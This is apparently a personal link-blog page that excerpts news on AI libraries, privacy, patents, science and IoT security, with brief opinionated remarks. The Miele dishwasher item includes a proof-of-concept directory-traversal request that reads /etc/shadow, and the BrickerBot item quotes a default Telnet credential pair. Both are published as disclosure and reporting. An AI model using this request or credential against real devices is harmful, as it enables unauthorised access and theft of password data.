Open sourcing Sonnet – a new library for constructing neural networks with Tensorflow

We have found that the flexibility and adaptiveness of TensorFlow lends itself to building higher level frameworks for specific purposes, and we’ve written one for quickly building neural network modules with TF. We are actively developing this codebase, but what we have so far fits our research needs well, and we’re excited to announce that today we are open sourcing it. We call this framework Sonnet.

Source: Open sourcing Sonnet – a new library for constructing neural networks | DeepMind

The main principle of Sonnet is to first construct Python objects which represent some part of a neural network, and then separately connect these objects into the TensorFlow computation graph. The objects are subclasses of sonnet.AbstractModule and as such are referred to as Modules.

Modules may be connected into the graph multiple times, and any variables declared in that module will be automatically shared on subsequent connection calls. Low level aspects of TensorFlow which control variable sharing, including specifying variable scope names, and using the reuse= flag, are abstracted away from the user.

Separating configuration and connection allows easy construction of higher-order Modules, i.e., modules that wrap other modules. For instance, the BatchApply module merges a number of leading dimensions of a tensor into a single dimension, connects a provided module, and then splits the leading dimension of the result to match the input. At construction time, the inner module is passed in as an argument to the BatchApply constructor. At run time, the module first performs a reshape operation on inputs, then applies the module passed into the constructor, and then inverts the reshape operation.

An additional advantage of representing Modules by Python objects is that it allows additional methods to be defined where necessary. An example of this is a module which, after construction, may be connected in a variety of ways while maintaining weight sharing. For instance, in the case of a generative model, we may want to sample from the model, or calculate the log probability of a given observation. Having both connections simultaneously requires weight sharing, and so these methods depend on the same variables. The variables are conceptually owned by the object, and are used by different methods of the module.

Github repository

1046 – Broadcom: Heap overflow in TDLS Teardown Request while handling Fast Transition IE: your phone can be taken over using rogue wifi signals

Source: 1046 – Broadcom: Heap overflow in TDLS Teardown Request while handling Fast Transition IE – project-zero – Monorail

Comes with proof of concept code

“BrickerBot” tries to kill your poorly secured IoT things

The Bricker Bot PDoS attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim’s devices. Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.’Corrupting a DeviceUpon successful access to the device, the PDoS bot performed a series of Linux commands that would ultimately lead to corrupted storage, followed by commands to disrupt Internet connectivity, device performance, and the wiping of all files on the device.

Source: “BrickerBot” Results In Permanent Denial-of-Service | ERT Threat Alert

The commands it runs are really really nasty…

one security researcher, 40 holes in Samsungs’ Tizen

A security researcher has found 40 unknown zero-day vulnerabilities in Tizen, the operating system that runs on millions of Samsung products.

Source: Samsung’s Android Replacement Is a Hacker’s Dream – Motherboard

Cisco Aironet 1830 Series and 1850 Series Access Points Mobility Express with hardcoded passwords

The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device.

cisco advisory

What  information Windows 10 Creators Update will slurp from your PC


Windows 10 Home and Pro has, right now, two levels of data collection, Basic and Full. When a computer is in Basic mode, Microsoft says Win 10 takes a note of the state of your hardware and its specifications, your internet connection quality, records of crashes and hangs by software, any compatibility problems, driver usage data, which apps you’ve installed and how you use them, and other bits and pieces.

In Full mode, shedloads more is sent over. It includes everything at the Basic level plus records of events generated by the operating system, and your “inking and typing data.” Engineers, with permission from Microsoft’s privacy governance team, can obtain users’ documents that trigger crashes in applications, so they can work out what’s going wrong. The techies can also run diagnostic tools remotely on the computers, again with permission from their overseers.
And next

In the Creators Update, aka Windows 10 version 1703, all this information will be collected in Basic mode. A lot of it is to help Microsofties pinpoint the cause of crashes and potential new malware infections, although it includes things like logs of you giving applications administrator privileges via the UAC, battery life readings, firmware version details, details of your hardware down to the color and serial number of the machine, which cell network you’re using, and so on.

Then there’s the information collected in Full mode, which includes everything in Basic plus your user settings and preferences, your browser choice, lists of your peripherals, the apps you use to edit and view images and videos, how long you use the mouse and keyboard, all the applications you’ve ever installed, URLs to videos you’ve watched that triggered an error, URLs to music that triggered an error, time spent reading ebooks, text typed in a Microsoft web browser’s address and search bar, URLs visited, visited webpage titles, the words you’ve spoken to Cortana or had translated to text by the system, your ink strokes, and more.

Source: Put down your coffee and admire the sheer amount of data Windows 10 Creators Update will slurp from your PC

This is just ridiculous!

Harry Shearer: Why My ‘Spinal Tap’ Lawsuit Affects All Creators

Last fall, Shearer filed a $125 million lawsuit against Vivendi – the company that owns This Is Spinal Tap – for financial misappropriation and launched a website called Fairness Rocks explaining his lawsuit. He alleged that the company says the four creators between them have only earned $81 in merchandizing income and $98 for their contributions to the movie’s soundtrack over a 22-year period
Unfortunately, “Hollywood accounting” isn’t a practice confined to California. Within the success story that is the European film and television industry, which generated €122 billion in 2013, less than one-third of 1 percent[1]was shared with the writers and directors of the works created. A peculiar definition of “fairness,” you might say.

Under French law, filmmakers should be paid a fee for their work plus an ongoing remuneration proportionate to the exploitation of their creation. In reality, less than 3 percent of French writers and directors receive anything more than the initial payment of that minimum guarantee.[2]And 70 percent of all European film directors are asked to defer a proportion of their original fees (as we, the creators of This is Spinal Tap, originally agreed to do).

Source: Harry Shearer: Why My ‘Spinal Tap’ Lawsuit Affects All Creators

This happens to rock stars too 🙁 Good luck guys!

Iron Man IRL: Gravity and Red Bull unveil personal jetpack

British aeronautic engineering startup Gravity unveiled a new human flying suit today. It’s a six-engine jet-propelled personal flying apparatus that the company says will take regular humans to superhero heights at several hundred miles per hour.

Source: Iron Man IRL: Gravity and Red Bull unveil personal jetpack

Molecule kills elderly cells, reduces signs of aging in mice

Even if you aren’t elderly, your body is home to agents of senility—frail and damaged cells that age us and promote disease. Now, researchers have developed a molecule that selectively destroys these so-called senescent cells. The compound makes old mice act and appear more youthful, providing hope that it may do the same for us.

“It’s definitely a landmark advance in the field,” says cell and molecular biologist Francis Rodier of the University of Montreal in Canada who wasn’t connected to the study. “This is the first time that somebody has shown that you can get rid of senescent cells without having any obvious side effects.”

Source: Molecule kills elderly cells, reduces signs of aging in mice

About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals

A new attack on smart TVs allows a malicious actor to take over devices using rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals, get root access on the smart TV, and use the device for all sorts of nasty actions, ranging from DDoS attacks to spying on end users.
Scheel’s method, which he recently presented at a security conference, is different because the attacker can execute it from a remote location, without user interaction, and runs in the TV’s background processes, meaning users won’t notice when an attacker compromises their TVs.

The researcher told Bleeping Computer via email that he developed this technique without knowing about the CIA’s Weeping Angel toolkit, which makes his work even more impressing.

Furthermore, Scheel says that “about 90% of the TVs sold in the last years are potential victims of similar attacks,” highlighting a major flaw in the infrastructure surrounding smart TVs all over the globe.

At the center of Scheel’s attack is Hybrid Broadcast Broadband TV (HbbTV), an industry standard supported by most cable providers and smart TV makers that “harmonizes” classic broadcast, IPTV, and broadband delivery systems. TV transmission signal technologies like DVB-T, DVB-C, or IPTV all support HbbTV.

Scheel says that anyone can set up a custom DVB-T transmitter with equipment priced between $50-$150, and start broadcasting a DVB-T signal.

Source: About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals

Virtual lemonade sends colour and taste to a glass of water

Ranasinghe and his team used an RGB colour sensor and a pH sensor to capture the colour and acidity of a freshly poured glass of lemonade. This data was sent to a special tumbler in another location that was filled with water. An electrode around the rim of the tumbler mimicked the sourness of the lemonade by stimulating the drinker’s taste buds with a pulse of electricity. LED lights replicated the colour.

Source: Virtual lemonade sends colour and taste to a glass of water | New Scientist

Miele Professional PG 8528 dishwasher insecure – Web Server Directory Traversal

The corresponding embeded webserver “PST10 WebServer” typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
~$ telnet 80
Connected to
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename=”./etc/shadow”
Accept-Ranges: bytes
Content-Length: 52


We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!

An Unexpected New Lung Function Has Been Found – They Make Blood

Researchers have discovered that the lungs play a far more complex role in mammalian bodies than we thought, with new evidence revealing that they don’t just facilitate respiration – they also play a key role in blood production.

In experiments involving mice, the team found that they produce more than 10 million platelets (tiny blood cells) per hour, equating to the majority of platelets in the animals’ circulation. This goes against the decades-long assumption that bone marrow produces all of our blood components.

Source: An Unexpected New Lung Function Has Been Found – They Make Blood

Intel Claims Optane Memory Will Speed Your Computer Up for Cheap

ntel’s new Optane memory is, according to Intel, an entirely new type of computer memory. It’s based on the 3D Xpoint memory architecture Intel announced back in July 2015. It’s as fast as the DRAM memory found in every computer used today, but as stable as the NAND memory found in the SSDs central to most of your pricier laptops.
And according to Intel, when its slotted into a computer alongside DRAM it speeds that computer up incredibly—giving you the kind of benefits traditionally only seen when you use a solid state drive. Intel claims computers power on twice as fast as they would without Optane, browsers launch five times faster, and games can launch up to 67 percent faster.

Intel Optane memory works as a kind of supercharger for a computer’s storage system. It doesn’t replace any components already in a computer. Instead it’s an add-on, clipped into the motherboard. In a computer’s processes Optane memory sits between the hard drive and the processor—remembering regularly accessed data, like RAM might, but retaining that information even when a program is closed or the computer is turned off.
Currently Optane memory will only be available for desktop computers with Kaby Lake processors and “Optane memory ready” motherboards (check the documentation for your motherboard to confirm)
For people who currently own a computer that’s Optane memory ready, it will fit into the M.2 slot on your motherboard—the same one currently used by the fastest solid state drives available, and as with DRAM memory, more is better. Optane memory will come in two sizes when it goes on sale April 24: 16GB ($44) and 32GB ($77).

Source: Intel Claims Its Magical New Memory Will Speed Your Computer Up for Cheap

Costco golf ball suit shows how threatening with unfounded patent accusations causes companies to die

Indeed, Costco might just be trying to beat Acushnet at a legal game that the ball maker has mastered—court sport. Acushnet has managed to muscle out other upstarts easily, simply by filing complaints.

Tiny manufacturers who can’t afford to litigate have been forced to fold based on Acushet’s accusations alone, with no proof of infringement. For example in 2015, Acushnet sued five small golf-ball makers. The co-founder of one of these companies, speaking on condition of anonymity because of the terms of the settlement, told Quartz that’s just how business is done.

Companies with deep pockets lock down the market by making it too expensive for competitors to operate and to offer lower-priced yet quality products. It is a legitimate tactic; even those who succumb to it don’t really begrudge the approach. The co-founder of the smaller competitor sued by Acushnet said he believes the company decides who to sue based on Golf Digest’s Hot List, which signals potential competitors, and that the company files claims regardless of actual infringement.

Source: A lawsuit over Costco golf balls shows why we can’t have nice things cheap

What a great system the patent and law system is!

Self flowing liquids

Imagine a liquid that could move on its own.

No need for human effort or the pull of gravity. You could put it in a container flat on a table, not touch it in any way, and it would still flow.

Brandeis researchers report in a new article in Science that they have taken the first step in creating a self-propelling liquid. The finding holds out the promise of developing an entirely new class of fluids that can flow without human or mechanical effort. One possible real-world application: Oil might be able to move through a pipeline without needing to be pumped.

Researchers recreate the system that causes cells to change shape. The result: a liquid that can move by itself.

Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules

The US House of Representatives has just approved a “congressional disapproval” vote of privacy rules, which gives your ISP the right to sell your internet history to the highest bidder.

The measure passed by 215 votes to 205.

This follows the same vote in the Senate last week. Just prior to the vote, a White House spokesman said the president supported the bill, meaning that the decision will soon become law.

This approval means that whoever you pay to provide you with internet access – Comcast, AT&T, Time Warner Cable, etc – will be able to sell everything they know about your use of the internet to third parties without requiring your approval and without even informing you.

Your ISP already knows quite a lot about you: your name and address, quite possibly your age, and a host of other personally identifiable information such as your social security number. That’s on the customer information side. On the service side, they know which websites you visit, when, and how often.

That information can be used to build a very detailed picture of who you are: what your political and sexual leanings are; whether you have kids; when you are at home; whether you have any medical conditions; and so on – a thousand different data points that, if they have sufficient value to companies willing to pay for them, will soon be traded without your knowledge.

Source: Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules

This is just incredible, even in Trumpland: rape and pillage the peons!

Set up a VPN!

A 3 billion solar mass black hole rockets out of a galaxy at 8 million kilometers per hour.

A black hole with three billion times the mass of the Sun has been found hurtling out of its parent galaxy at 8 million kilometers per hour! What could give it that kind of incredible boost? Turns out, it’s something even more incredible: the two supermassive black holes that merged to form it in the first place.
In astronomy, you deal with a lot of ridiculously violent cosmic phenomena. Stars explode, asteroids collide, whole galaxies smash together. When you look at the math and physics, when you actually grasp the levels of power involved, it’ll make the hair on the back of your neck stand up. It’s chaos wielded on a mind-crushing scale.

And then there’s the “two supermassive black holes colliding and merging and then launching the resulting even larger billion-solar-mass black hole out of a galaxy at nearly 8 million kilometers per hour due to gravitational waves” scale of immensity.

Source: A 3 billion solar mass black hole rockets out of a galaxy at 8 million kilometers per hour. Yes, seriously.

Google Open Sources guetzli jpeg encoder

Guetzli is a JPEG encoder that aims for excellent compression density at high visual quality. Guetzli-generated images are typically 20-30% smaller than images of equivalent quality generated by libjpeg. Guetzli generates only sequential (nonprogressive) JPEGs due to faster decompression speeds they offer.

UK flight ban on electronic devices announced – copying Trumpist insanity

The UK government has announced a cabin baggage ban on laptops and tablets on direct flights to the UK from Turkey, Lebanon, Jordan, Egypt, Tunisia and Saudi Arabia.

The ban follows a similar move in the US, where officials say bombs could be hidden in a series of devices.

Downing Street said it was “necessary, effective and proportionate”.

The government has not given a start-date for the ban, but says airlines are “in the process of implementing it”.

The ban applies to any device larger than 16cm long, 9.3cm wide or 1.5cm deep. It includes smart phones, but most fall inside these limits.

Any affected device, including e-readers, will need to be placed into hold luggage.

Source: UK flight ban on electronic devices announced – BBC News

This looks like a bit of the government being “Seen to do Somethig(tm)” even if that something is incredibly useless and hinders passengers, like the ban on liquids. It also looks very much like the UK is in the pocket of the US, which looks worse now that it’s being run by wealth raping clowns.

Burglars can easily make Google Nest security cameras stop recording

The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends to the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter, respectively.

That’s easy to do as Bluetooth is never disabled after the initial setup of the cameras, and attackers (e.g. burglars) can usually come close enough to them to perform the attack.

Triggering one of these flaws will make the devices crash and reboot.

The third flaw is a bit more serious, as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to.

If that particular SSID does not exist, the camera drops its attempt to associate with it and return to the original Wi-Fi network, but the whole process can last from 60 to 90 seconds, during which the camera won’t be recording.

Source: Burglars can easily make Google Nest security cameras stop recording – Help Net Security

A new definition would add 102 planets to our solar system — including Pluto

Pluto fans are attempting to reignite a contentious astronomy debate: What is a planet?
Is Pluto a planet?

It’s not a question scientists ask in polite company.

“It’s like religion and politics,” said Kirby Runyon, a planetary scientist at Johns Hopkins University. “People get worked up over it. I’ve gotten worked up over it.”
The issue can bring conversations to a screeching halt, or turn them into shouting matches. “Sometimes,” Runyon said, “it’s just easier not to bring it up.”

But Runyon will ignore his own advice this week when he attends the annual Lunar and Planetary Science Conference in Houston. In a giant exhibit hall crowded with his colleagues, he’s attempting to reignite the debate about Pluto’s status with an audacious new definition for planet — one that includes not just Pluto, but several of its neighbors, objects in the asteroid belt, and a number of moons. By his count, 102 new planets could be added to our solar system under the new criteria.
When the IAU voted in 2006, scientists came to the conclusion that gravitational dominance is what distinguishes the eight planets from the solar system’s other spheres. From giant Jupiter to tiny Mercury, each is massive enough to make them the bullies of their orbits, absorbing, ejecting or otherwise controlling the motion of every other object that gets too close. According to the definition, planets must also orbit the sun.

Pluto, which shares its zone of the solar system with a host of other objects, was reclassified as a “dwarf planet” — a body that resembles a planet but fails to “clear its neighborhood,” in the IAU’s parlance.
But to Runyon, that distinction is less important than what dozens of solar system worlds have in common: geology.

“I’m interested in an object’s intrinsic properties,” he said. “What it is on its surface and in its interior? Whether an object is in orbit around another planet or the sun doesn’t really matter for me.”

Runyon calls his a “geophysical” definition. A planet, he says, is anything massive enough that gravity pulls it into a sphere (a characteristic called “hydrostatic equilibrium”), but not so massive that it starts to undergo nuclear fusion and become a star.
If you talk to enough scientists on either side of this debate, you’ll notice that their arguments start to echo each other. They use the same terms to criticize the definitions they don’t like: “not useful,” “too emotional,” “confusing.” Both groups want the same thing: for the public to understand and embrace the science of the solar system. But each is convinced that only their definition can achieve that goal. And each accuses the other of confusing people by prolonging the debate.

Source: A new definition would add 102 planets to our solar system — including Pluto

Give us Pluto back!

Patents Are A Big Part Of Why We Can’t Own Nice Things: the Supreme Court Should Fix That

Today, the Supreme Court heard arguments in a case that could allow companies to keep a dead hand of control over their products, even after you buy them. The case, Impression Products v. Lexmark International, is on appeal from the Court of Appeals for the Federal Circuit, who last year affirmed its own precedent allowing patent holders to restrict how consumers can use the products they buy. That decision, and the precedent it relied on, departs from long established legal rules that safeguard consumers and enable innovation.

When you buy something physical—a toaster, a book, or a printer, for example—you expect to be free to use it as you see fit: to adapt it to suit your needs, fix it when it breaks, re-use it, lend it, sell it, or give it away when you’re done with it. Your freedom to do those things is a necessary aspect of your ownership of those objects. If you can’t do them, because the seller or manufacturer has imposed restrictions or limitations on your use of the product, then you don’t really own them. Traditionally, the law safeguards these freedoms by discouraging sellers from imposing certain conditions or restrictions on the sale of goods and property, and limiting the circumstances in which those restrictions may be imposed by contract.

Source: Patents Are A Big Part Of Why We Can’t Own Nice Things: the Supreme Court Should Fix That

Patent law out of control again

Bloke, 48, accused of whaling two US tech leviathans out of $100m

According to allegations in the indictment against Rimasauskas, which was unsealed this week, he had orchestrated his scheme between 2013 and 2015, targeting “a multinational technology company and a multinational online social media company” and tricking them into wiring funds to bank accounts under his control.

The bank accounts in question belonged to companies that Rimasauskas had himself set up and incorporated with the same name as an unspecified “Asian-based computer hardware manufacturer” with whom the victim companies were involved in legitimate business.

Rimasauskas’s phishing emails posed as if they represented the real hardware manufacturer, and requested that money which the victim companies owed to that manufacturer for legitimate good and services be paid into the accounts of the company he’d set up himself.

Source: Bloke, 48, accused of whaling two US tech leviathans out of $100m

Russian mastermind of $500m bank-raiding Citadel coughs to crimes

Mark Vartanyan, who operated under the handle “Kolypto”, was arrested in Norway last year, and extradited to America in December. The 29-year-old was charged with one count of computer fraud. On Monday, he pleaded guilty [PDF] to a district court in Atlanta, US. He faces up to 10 years in the clink and a $250,000 fine – that’s slashed from a maximum of 25 years due to his guilty plea. He will be sentenced in June.
Citadel surfaced in 2011, infected Windows PCs, and silently slurped victims’ online banking credentials so their money could be siphoned into crooks’ pockets. It could also snoop on computer screens and hold files to ransom. It was a remarkable success. US prosecutors estimate that, at its height, the malware infected 11 million computers and was responsible for the theft of more than $500m from bank accounts.

Source: Russian mastermind of $500m bank-raiding Citadel coughs to crimes

Skip to toolbar